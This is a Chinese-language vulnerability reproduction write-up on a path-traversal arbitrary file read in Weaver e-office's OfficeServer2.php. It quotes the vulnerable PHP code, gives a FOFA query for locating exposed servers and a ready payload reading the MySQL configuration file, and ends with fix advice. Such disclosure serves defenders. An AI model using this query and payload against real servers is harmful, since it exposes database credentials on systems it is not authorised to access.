泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现

本文涉及的产品
容器镜像服务 ACR,镜像仓库100个 不限时长
可观测监控 Prometheus 版,每月50GB免费额度
MSE Nacos/ZooKeeper 企业版试用,1600元额度,限量50份
简介: 泛微e-office OfficeServer2.php 存在任意文件读取漏洞,攻击者可通过构造特定Payload获取敏感数据信息。

声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、漏洞描述

泛微e-office OfficeServer2.php存在任意文件读取漏洞隐患,攻击者可通过此漏洞获取敏感信息,为下一步攻击做准备。

image.png

二、漏洞分析

打开iWeboffice/OfficeServer2.php,代码如下:


//取得操作命令信息

$mOption=$OPTION;                                                 //取得操作命令信息

switch ($mOption){

 case "LOADFILE":

   $mFileName = $_REQUEST["FILENAME"];

   $mRecordID = $_REQUEST['RECORDID'];

   $mFullPath = $mFilePath."/".$mRecordID."/".$mFileName;

   $mFullPath = iconv("utf-8","gbk",$mFullPath);

   $result    = file_exists($mFullPath);

   if($result == false) {

     $MsgError=$_lang["file_file_not_exist"].$mFullPath;                                 //设置错误信息

   } else {

     $fd = fopen($mFullPath, "rb");

     $mFileSize = filesize($mFullPath);

     $mFileBody = fread($fd, filesize($mFullPath));

     fclose( $fd );

     $MsgObj=$MsgObj."STATUS=".base64_encode($_lang["file_open_success"]."!")."\r\n";       //设置状态信息

   }

   break;

 case "SAVEFILE":                                             //下面的代码为保存文件在服务

   $mFileName = $_REQUEST["FILENAME"];

   $mRecordID = $_REQUEST['RECORDID'];

   $mFullPath = $mFilePath."/".$mRecordID."/".$mFileName;

   if (is_uploaded_file($_FILES['MsgFileBody']['tmp_name']))

   {                                                             //保存文档内容

     if (move_uploaded_file($_FILES['MsgFileBody']['tmp_name'], iconv("utf-8","gbk",$mFullPath)))

     {                                                //把文档保存到$mFullPath目录下面

       $mFileSize = $_FILES['MsgFileBody']['size'];   //取得文档大小

       $result    = true;

     }

     else

     {

       $MsgError=$_lang["file_save_fail"];                 //设置错误信息

       $result=false;

     }

   }

   else

   {

     $MsgError=$_lang["file_upload_fail"];                 //设置错误信息

     $result=false;

   }

   if($result)

   {

     $MsgObj=$MsgObj."STATUS=".base64_encode($_lang["file_save_success"]."!")."\r\n";   //设置状态信息

   }

   break;


在审计过程中看到LOADFILE。通过$mFileName = $_REQUEST[“FILENAME”];

获取文件名字。而下面的流程没有进行过滤就造成了任意文件读取。

image.png


三、漏洞复现

FOFA: app="泛微-EOffice"

构造POC读取配置文件(V9,V10)


Payload:iweboffice/officeserver2.php?OPTION=LOADFILE&FILENAME=../../bin/mysql_config.ini

image.png

四、修复建议


1、对用户输入进行严格的过滤和校验,避免出现任意文件读取漏洞

2、升级到安全版本

目录
相关文章
|
PHP
PHP 下载文件读取文件并下载
PHP 下载文件读取文件并下载
213 0
|
网络协议 NoSQL 应用服务中间件
php OSS 文件读取和写入文件,workerman 生成临时文件并输出浏览器下载
php OSS 文件读取和写入文件,workerman 生成临时文件并输出浏览器下载
673 0
|
机器学习/深度学习 Linux PHP
PHP.ini文件读取不到
Configuration File (php.ini) Path /usr/local/php/lib Loaded Configuration File (none) Linux 把 dtruss 改成strace 就可以 我的是mac的系统 jackluo@JackLu...
854 0
|
13天前
|
关系型数据库 MySQL PHP
PHP和Mysql前后端交互效果实现
本文介绍了使用PHP连接MySQL数据库的基本函数及其实现案例。内容涵盖数据库连接、选择数据库、执行查询、获取结果等常用操作,并通过用户登录和修改密码的功能实例,展示了PHP与MySQL的交互过程及代码实现。
123 0
PHP和Mysql前后端交互效果实现
|
5月前
|
关系型数据库 MySQL Linux
查看Linux、Apache、MySQL、PHP版本的技巧
以上就是查看Linux、Apache、MySQL、PHP版本信息的方法。希望这些信息能帮助你更好地理解和使用你的LAMP技术栈。
294 17
|
10月前
|
前端开发 关系型数据库 MySQL
PHP与MySQL动态网站开发实战指南####
【10月更文挑战第21天】 本文将深入浅出地探讨如何使用PHP与MySQL构建一个动态网站,从环境搭建到项目部署,全程实战演示。无论你是编程新手还是希望巩固Web开发技能的老手,都能在这篇文章中找到实用的技巧和启发。我们将一起探索如何通过PHP处理用户请求,利用MySQL存储数据,并最终呈现动态内容给用户,打造属于自己的在线平台。 ####
415 0
|
6月前
|
关系型数据库 MySQL PHP
源码编译安装LAMP(HTTP服务,MYSQL ,PHP,以及bbs论坛)
通过以上步骤,你可以成功地在一台Linux服务器上从源码编译并安装LAMP环境,并配置一个BBS论坛(Discuz!)。这些步骤涵盖了从安装依赖、下载源代码、配置编译到安装完成的所有细节。每个命令的解释确保了过程的透明度,使即使是非专业人士也能够理解整个流程。
149 18
|
7月前
|
关系型数据库 MySQL 网络安全
如何排查和解决PHP连接数据库MYSQL失败写锁的问题
通过本文的介绍,您可以系统地了解如何排查和解决PHP连接MySQL数据库失败及写锁问题。通过检查配置、确保服务启动、调整防火墙设置和用户权限,以及识别和解决长时间运行的事务和死锁问题,可以有效地保障应用的稳定运行。
321 25
|
10月前
|
安全 关系型数据库 MySQL
PHP与MySQL动态网站开发实战指南####
——深入探索LAMP栈下的高效数据交互与处理技巧 ####
|
9月前
|
存储 关系型数据库 MySQL
PHP与MySQL动态网站开发:从基础到实践####
本文将深入探讨PHP与MySQL的结合使用,展示如何构建一个动态网站。通过一系列实例和代码片段,我们将逐步了解数据库连接、数据操作、用户输入处理及安全防护等关键技术点。无论您是初学者还是有经验的开发者,都能从中获益匪浅。 ####